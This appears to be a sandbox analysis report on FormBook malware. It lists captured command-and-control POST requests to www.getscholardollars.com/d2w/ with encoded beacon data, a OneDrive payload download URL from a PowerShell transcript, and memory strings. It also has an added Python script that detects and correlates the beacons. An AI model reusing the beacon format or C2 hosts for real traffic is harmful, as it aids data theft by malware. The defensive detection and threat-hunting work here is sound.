6e 2d 36 70 6f 75 52 58 45 74 79 4c 54 48 52 64 6c 6f 37 7a 52 66 31 31 4d 39 59 49 44 51 6d 35 61 69 41 72 50 48 38 44 6f 34 44 79 70 59 71 4f 7e 74 35 74 61 2d 28 35 4e 6f 45 54 65 54 36 79 6f 43 79 2d 58 79 36 76 78 6d 45 66 64 4e 41 77 4d 78 34 39 78 5f 31 35 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
pvj01lRX=ncZmaR6GSsQXrKqgJIxXha18JcLQZoAOaDWlZMRclYZSho9PonBU5uDSsuLN89UkUzRlidjxwJ7Dj3lRHQ3-1ZF2OFlgDFEwAA4Lh-i-XoaxP9zh6bJUFSQBhPvC2-ikIVW_LwxiGr(C3hTiace_rOefnMki5qqVdRT4r1ndVT64eCoqQupN8UTtrToyfbpKASdE2Ai3jJCRpBXXgty0xHec~ZA1C1prZ4OVuMtdy5ldR8aVAWBySmcOWDfQ9x0877ElmHDxlC2j(PyaYXycCb(_LCRhfUXaHyz4gz(EiRkPIto2EUyqCLGWn-6pouRXEtyLTHRdlo7zRf11M9YIDQm5aiArPH8Do4DypYqO~t5ta-(5NoETeT6yoCy-Xy6vxmEfdNAwMx49x_154Q).
      Source: global trafficHTTP traffic detected: POST /d2w/ HTTP/1.1Host: www.getscholardollars.comConnection: closeContent-Length: 252650Cache-Control: no-cacheOrigin: http://www.getscholardollars.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getscholardollars.com/d2w/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 76 6a 30 31 6c 52 58 3d 6e 63 5a 6d 61 56 48 67 66 5f 38 47 73 34 4f 68 49 59 68 66 6c 61 6c 75 4e 65 28 39 51 62 67 64 45 6a 36 31 5a 50 5a 59 77 4a 4a 41 72 6f 4e 50 75 6c 70 66 69 2d 43 67 71 75 4c 4b 75 4e 49 59 5a 41 41 6d 69 5a 37 66 77 4a 7a 43 32 6b 73 36 48 67 32 6e 30 35 34 4e 49 46 68 37 44 48 78 69 41 6a 55 70 33 75 7e 2d 54 59 69 33 44 38 6a 32 39 65 78 52 4a 44 38 5a 6e 4b 54 62 32 4e 57 32 4b 33 72 53 44 52 39 67 43 59 6a 64 79 67 44 61 66 4c 36 37 68 39 69 45 37 65 5a 34 39 39 79 52 52 30 6d 46 33 67 62 63 59 44 53 69 55 69 5a 66 56 66 74 6a 36 48 4c 66 72 51 49 59 54 4f 67 55 52 68 5a 4d 35 53 57 52 74 62 75 54 69 57 37 66 32 65 4b 4a 7a 47 75 6a 6d 72 59 75 55 30 46 69 65 2d 4b 37 6a 4e 46 6d 30 49 70 52 5a 74 71 39 44 48 46 36 5a 48 73 68 52 41 4f 51 33 42 55 4f 7e 35 49 58 6f 48 44 61 6e 43 32 33 30 75 53 79 63 68 53 68 46 62 76 57 43 6c 30 39 66 6b 71 64 43 77 48 38 75 79 37 76 67 68 6f 44 44 39 34 4f 50 52 71 74 53 4d 76 33 70 65 36 71 6f 73 4a 71 45 74 79 68 54 47 52 37 6b 64 72 7a 54 4b 42 6d 50 61 4d 50 53 41 6e 37 59 79 51 31 59 41 31 59 6f 34 62 79 37 38 75 6b 28 61 74 74 4c 64 33 2d 4e 4a 45 54 64 6a 36 79 69 53 7a 2d 47 44 66 64 7a 46 45 77 4b 64 52 56 4e 42 49 70 38 2d 49 31 6f 6d 51 45 4d 42 4e 47 43 41 41 43 7e 33 46 7a 61 4f 55 51 32 47 39 72 68 46 68 57 41 7a 46 5a 32 4b 77 7a 37 2d 28 6a 35 52 53 62 46 30 79 4a 70 36 55 42 54 4b 57 30 71 59 32 78 63 48 69 47 66 37 59 4c 7a 69 52 6d 4a 76 65 5a 42 50 36 64 35 42 33 44 44 55 72 39 36 46 59 6e 32 72 49 68 76 4e 70 55 49 54 41 63 78 54 
48 4d 67 30 41 6b 64 41 70 7a 6e 65 4f 35 66 46 69 42 6a 52 39 51 28 6f 65 49 78 37 77 52 31 31 72 51 44 6a 34 6b 4c 72 38 4b 48 74 4f 6d 73 78 64 6b 54 31 64 7a 4f 55 35 6f 62 53 71 6a 75 6e 59 63 35 64 64 44 73 72 56 4e 77 6c 38 51 31 76 6e 4c 52 4c 36 79 44 39 56 7a 28 57 46 58 4f 35 58 2d 62 76 4a 6d 7a 62 78 50 5a 6c 35 39 39 58 68 38 74 48 54 36 74 5a 50 66 42 41 6f 78 69 6e 76 6f 4d 39 66 65 75 6a 5a 6a 59 6f 59 44 76 4f 6b 57 63 36 4e 36 28 68 6c 53 55 52 4f 4c 54 78 6f 41 4b 6a 6d 38 58 4c 7a 5a 77 46 6e 4f 53 58 42 46 4d 4c 47 5f 79 63 6f 68 7a 45 67 34 77 6a 68 75 32 57 74 53 34 49 43 64 54 43 49 38 43 59 47 4c 33 74 6c 31 35 33 31 65 46 77 4a 38 58 76 6d 4a 79 42 69 73 58 74 49 64 75 37 79 74 64 4b 4c 51 4f 59 42 33 7a 30 66 67 31 69 38 6a 50 63 6b 7a 63 52 58 5a 4e 6e 57 37 78 78 75 77 47 32 38 56 79 45 38 74 62 69 50 74 46 66 47 32 66 5f 64 38 5a 4f 30 51 53 4d 69 66 78 34 6f 48 63 6d 38 4e 38 7a 64 61 4a 46 30 37 62 72 49 73 76 5a 6d 65 34 48 61 79 30 46 68 32 63 30 4e 6d 78 4f 71 34 4f 51 63 69 5
Source: C:\Windows\explorer.exe | Code function: 11_2_0588A5A2 getaddrinfo,setsockopt,recv | 11_2_0588A5A2
Source: svchost.exe, 00000010.00000002.483024815.0000000003E9F000.00000004.00000001.sdmp | String found in binary or memory: Location: http://www.facebook.com/groups/collegemodeparentretreat equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
      Source: unknownHTTP traffic detected: POST /d2w/ HTTP/1.1Host: www.getscholardollars.comConnection: closeContent-Length: 414Cache-Control: no-cacheOrigin: http://www.getscholardollars.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getscholardollars.com/d2w/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 70 76 6a 30 31 6c 52 58 3d 6e 63 5a 6d 61 52 36 47 53 73 51 58 72 4b 71 67 4a 49 78 58 68 61 31 38 4a 63 4c 51 5a 6f 41 4f 61 44 57 6c 5a 4d 52 63 6c 59 5a 53 68 6f 39 50 6f 6e 42 55 35 75 44 53 73 75 4c 4e 38 39 55 6b 55 7a 52 6c 69 64 6a 78 77 4a 37 44 6a 33 6c 52 48 51 33 2d 31 5a 46 32 4f 46 6c 67 44 46 45 77 41 41 34 4c 68 2d 69 2d 58 6f 61 78 50 39 7a 68 36 62 4a 55 46 53 51 42 68 50 76 43 32 2d 69 6b 49 56 57 5f 4c 77 78 69 47 72 28 43 33 68 54 69 61 63 65 5f 72 4f 65 66 6e 4d 6b 69 35 71 71 56 64 52 54 34 72 31 6e 64 56 54 36 34 65 43 6f 71 51 75 70 4e 38 55 54 74 72 54 6f 79 66 62 70 4b 41 53 64 45 32 41 69 33 6a 4a 43 52 70 42 58 58 67 74 79 30 78 48 65 63 7e 5a 41 31 43 31 70 72 5a 34 4f 56 75 4d 74 64 79 35 6c 64 52 38 61 56 41 57 42 79 53 6d 63 4f 57 44 66 51 39 78 30 38 37 37 45 6c 6d 48 44 78 6c 43 32 6a 28 50 79 61 59 58 79 63 43 62 28 5f 4c 43 52 68 66 55 58 61 48 79 7a 34 67 7a 28 45 69 52 6b 50 49 74 6f 32 45 55 79 71 43 4c 47 57 6e 2d 36 70 6f 75 52 58 45 74 79 4c 54 48 52 64 6c 6f 37 7a 52 66 31 31 4d 39 59 49 44 51 6d 35 61 69 41 72 50 48 38 44 6f 34 44 79 70 59 71 4f 7e 74 35 74 61 2d 28 35 4e 6f 45 54 65 54 36 79 6f 43 79 2d 58 79 36 76 78 6d 45 66 64 4e 41 77 4d 78 34 39 78 5f 31 35 34 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
pvj01lRX=ncZmaR6GSsQXrKqgJIxXha18JcLQZoAOaDWlZMRclYZSho9PonBU5uDSsuLN89UkUzRlidjxwJ7Dj3lRHQ3-1ZF2OFlgDFEwAA4Lh-i-XoaxP9zh6bJUFSQBhPvC2-ikIVW_LwxiGr(C3hTiace_rOefnMki5qqVdRT4r1ndVT64eCoqQupN8UTtrToyfbpKASdE2Ai3jJCRpBXXgty0xHec~ZA1C1prZ4OVuMtdy5ldR8aVAWBySmcOWDfQ9x0877ElmHDxlC2j(PyaYXycCb(_LCRhfUXaHyz4gz(EiRkPIto2EUyqCLGWn-6pouRXEtyLTHRdlo7zRf11M9YIDQm5aiArPH8Do4DypYqO~t5ta-(5NoETeT6yoCy-Xy6vxmEfdNAwMx49x_154Q).
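The GET and POST records above show the beacon shape the report attributes to FormBook: the same path (/d2w/) and parameter name (pvj01lRX) on two different hosts, GETs that carry no User-Agent at all (the report's "HTTP GET or POST without a user agent" signature) and a POST that borrows a Trident/7.0 browser User-Agent (its "Uses a known web browser user agent" signature). The Python below is an added example, not code from the report: it parses constructed raw requests rebuilt from those records, flags each request, and correlates the path/parameter pair across hosts. The 40-character threshold for an "opaque" value, the shortened POST body and the example.com control request are assumptions; hosts, path, parameter names and headers are the report's.

```python
from urllib.parse import urlsplit, parse_qs
from typing import Dict, List, Set, Tuple

# Constructed raw requests rebuilt from the report's HTTP records. Hosts, path,
# parameter names and headers are the report's; the POST body is a shortened
# stand-in and the example.com request is a benign control. Thresholds are assumed.
FORMBOOK_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"
POST_BODY = "pvj01lRX=ncZmaR6GSsQXrKqgJIxXha18JcLQZoAOaDWlZMRclYZSho9PonBU5uDSsuLN89Uk"

SAMPLE_REQUESTS = [
    "GET /d2w/?pvj01lRX=/65nfF/Nxm10NrnhIxqp1OrccA5CCv2C4tVcC1Dq4jiYYSyOmWBHNW0BaFzMFPrna1Df&FD=9rX8FzT0 HTTP/1.1\r\n"
    "Host: www.equifaxsecurity.com\r\nConnection: close\r\n\r\n",
    "GET /d2w/?pvj01lRX=v+VcEx2Oat8H1YXXcMhJ7KJgBNn6b4Axe2Hid9VQh65hvLdlnlM3p4DL0Zb2+MwuG01o&FD=9rX8FzT0 HTTP/1.1\r\n"
    "Host: www.getscholardollars.com\r\nConnection: close\r\n\r\n",
    "POST /d2w/ HTTP/1.1\r\nHost: www.getscholardollars.com\r\nConnection: close\r\n"
    f"Content-Length: {len(POST_BODY)}\r\nCache-Control: no-cache\r\n"
    "Origin: http://www.getscholardollars.com\r\n"
    f"User-Agent: {FORMBOOK_UA}\r\nContent-Type: application/x-www-form-urlencoded\r\n"
    "Accept: */*\r\nReferer: http://www.getscholardollars.com/d2w/\r\n\r\n" + POST_BODY,
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.4.0\r\n\r\n",
]

OPAQUE_LEN = 40  # assumed: a parameter value this long with no structure is treated as a beacon blob


def parse_request(raw: str) -> Dict:
    """Minimal HTTP/1.1 request parser: method, path, host, headers and the parameters."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)
    if method == "POST" and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params = parse_qs(body, keep_blank_values=True)  # POST carries the blob in the body instead
    return {"method": method, "path": url.path, "host": headers.get("host", ""),
            "headers": headers, "params": params}


def beacon_param(req: Dict) -> Tuple[str, int]:
    """Name and length of the longest parameter value (query for GET, body for POST)."""
    best = ("", 0)
    for name, values in req["params"].items():
        longest = max((len(v) for v in values), default=0)
        if longest > best[1]:
            best = (name, longest)
    return best


def inspect(req: Dict) -> List[str]:
    """Per-request findings mirroring the report's two HTTP signatures."""
    findings = []
    if "user-agent" not in req["headers"]:
        findings.append("missing User-Agent")
    name, length = beacon_param(req)
    if length >= OPAQUE_LEN:
        findings.append(f"opaque beacon parameter: {name}")
    return findings


def correlate(reqs: List[Dict]) -> Dict[Tuple[str, str], Set[str]]:
    """Group beacons by (path, parameter name); return groups seen on two or more hosts."""
    groups: Dict[Tuple[str, str], Set[str]] = {}
    for req in reqs:
        name, length = beacon_param(req)
        if length >= OPAQUE_LEN:
            groups.setdefault((req["path"], name), set()).add(req["host"])
    return {key: hosts for key, hosts in groups.items() if len(hosts) >= 2}


if __name__ == "__main__":
    parsed = [parse_request(r) for r in SAMPLE_REQUESTS]
    for req in parsed:
        print(req["method"], req["host"] + req["path"], inspect(req) or "-")
    print(correlate(parsed))
```

The correlation is the part worth keeping: blocking www.getscholardollars.com alone does nothing when the same path and parameter name reappear on www.equifaxsecurity.com, so hunt on the (path, parameter) pair plus the Connection: close / no-User-Agent GET shape rather than on a host list. The two Snort 403 alerts above fit the same picture: not every host in the rotation answers.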
Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000006.00000002.321354110.0000000000A5B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: PowerShell_transcript.128757.J4I_YvVX.20200827024953.txt.1.dr | String found in binary or memory: http://onedrive.live.com/download?cid=18579953F243D979&resid=18579953F243D979%21126&authkey=AIuP0x-y
Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000000B.00000002.493461114.00000000058A7000.00000040.00000001.sdmp, svchost.exe, 00000010.00000002.482793213.0000000003BA9000.00000004.00000001.sdmp | String found in binary or memory: http://www.getscholardollars.com
Source: explorer.exe, 0000000B.00000002.493461114.00000000058A7000.00000040.00000001.sdmp, svchost.exe, 00000010.00000002.482793213.0000000003BA9000.00000004.00000001.sdmp | String found in binary or memory: http://www.getscholardollars.com/d2w/
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000000B.00000000.306262656.000000000BA46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: svchost.exe, 00000006.00000002.321462056.0000000000A76000.00000004.00000001.sdmp | String found in binary or memory: https://6lyy0a.am.files.1drv.com/
Source: svchost.exe, 00000006.00000002.321291081.0000000000A49000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.321373361.0000000000A61000.00000004.00000001.sdmp | String found in binary or memory: https://6lyy0a.am.files.1drv.com/y4m9LWIwBSOQZ002FnO9AlFZI4TaGiuL9HMMApb3heBdjyHRxs5mpHgknPTr_7Tg3GK
Source: svchost.exe, 00000006.00000002.321373361.0000000000A61000.00000004.00000001.sdmp | String found in binary or memory: https://6lyy0a.am.files.1drv.com/y4mrpAmFXuLrMlicrs_2MxPy0LaI4-OoewYBlymu_OvxOlZgP-5lXyjsNgp7IbARiEI
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.onedrive.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://augloop.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.entity.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cortana.ai
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://cr.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://directory.services.
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.ppe.windows.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.ppe.windows.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.windows.net
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://graph.windows.net/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://incidents.diagnostics.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://lifecycle.office.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.microsoftonline.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.microsoftonline.com/common
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows.local
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://management.azure.com
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://management.azure.com/
      Source: EC5C2C29-06EF-4C12-B137-58A90FC5C25F.0.drString found in binary or memory: https://messaging.office.com/
